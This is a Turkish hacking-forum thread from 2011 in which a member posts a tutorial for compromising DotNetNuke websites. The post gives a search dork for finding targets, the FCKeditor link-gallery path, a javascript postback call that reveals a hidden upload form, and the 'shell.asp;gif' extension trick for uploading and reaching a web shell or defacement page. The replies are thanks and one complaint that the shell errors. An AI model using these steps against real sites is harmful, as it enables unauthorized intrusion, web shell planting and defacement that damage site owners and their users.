THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

dotnuke açığı (resimli anlatım)

W£$L£Y - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2010
Nereden:
Geldigimin Ne Önemi Var
Mesajlar:
386
Konular:
90
Teşekkür (Etti):
47
Teşekkür (Aldı):
81
Ticaret:
(0) %
01-06-2011 17:35
#1
dotnuke açığı (resimli anlatım)
Merhaba arkadaşlar . İlk önce dorkumuzu google-yahoo-ask.com gibi sitelerde taratalım ve çıkan sitelere bir bakalım.
Dork :Kod:
tabid/36/language/en-US/Default.aspx


Çıkan sitelerin sonunu siliyoruz ve ;
Kod:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Yapıştırıp enter'lıyoruz.

Karşımıza

Gibi bir yer çıktı ise 3. seçenek olan File'a tıklıyoruz.

Gibi bir görünüm çıkması lazım . Böle görünüyor ve upload yeri yok .

Kod:
javascript:__doPostBack('ctlURL$cmdUpload','')
kodunu yapıştırıyoruz ve ileri diyoruz . Sonra karşımıza ;

çıkıyor. Ve gözat deyip shellimizi ya da index'imi seçip upload diyoruz. Kabul edildiğini anlamak için
index ise ;
Kod:
site.com/Portals/0/indexadı.asp;gif

shell ise;
Kod:
site.com/Portals/0/shell.asp;gif
yada uzantısı jpg belli olmaz o shellinize bağlı . Artık gerisi size kalmış .
Anlatım bana aittir alıntı değildir.
--------------------- ------------------Türk Hack Team-------------

------------------BBY W£$L£Y-------------
ankakurt, zztri Teşekkür etti.
Manyaq_HAcER - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2009
Nereden:
BİLECİK
Mesajlar:
731
Konular:
150
Teşekkür (Etti):
11
Teşekkür (Aldı):
60
Ticaret:
(0) %
01-06-2011 18:35
#2
eyw üsteğmenim..
W£$L£Y Teşekkür etti.
W£$L£Y - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2010
Nereden:
Geldigimin Ne Önemi Var
Mesajlar:
386
Konular:
90
Teşekkür (Etti):
47
Teşekkür (Aldı):
81
Ticaret:
(0) %
02-06-2011 09:40
#3
saol binbaşım
--------------------- ------------------Türk Hack Team-------------

------------------BBY W£$L£Y-------------
Er0in - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Nereden:
System32
Mesajlar:
406
Konular:
54
Teşekkür (Etti):
44
Teşekkür (Aldı):
29
Ticaret:
(0) %
12-06-2011 01:41
#4
hacı yok ya shelli atıyorum ama shelle gircegim zaman error verio
---------------------
We Are Quidams
We Are Legion
We Can Not Capture
We Do Not Forget
We For Us...
atakan_58 Teşekkür etti.
Margu - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2010
Mesajlar:
2.944
Konular:
1669
Teşekkür (Etti):
263
Teşekkür (Aldı):
643
Ticaret:
(0) %
12-06-2011 02:16
#5
sağol
W£$L£Y - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2010
Nereden:
Geldigimin Ne Önemi Var
Mesajlar:
386
Konular:
90
Teşekkür (Etti):
47
Teşekkür (Aldı):
81
Ticaret:
(0) %
12-06-2011 18:27
#6
sende yorum için saol
--------------------- ------------------Türk Hack Team-------------

------------------BBY W£$L£Y-------------

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler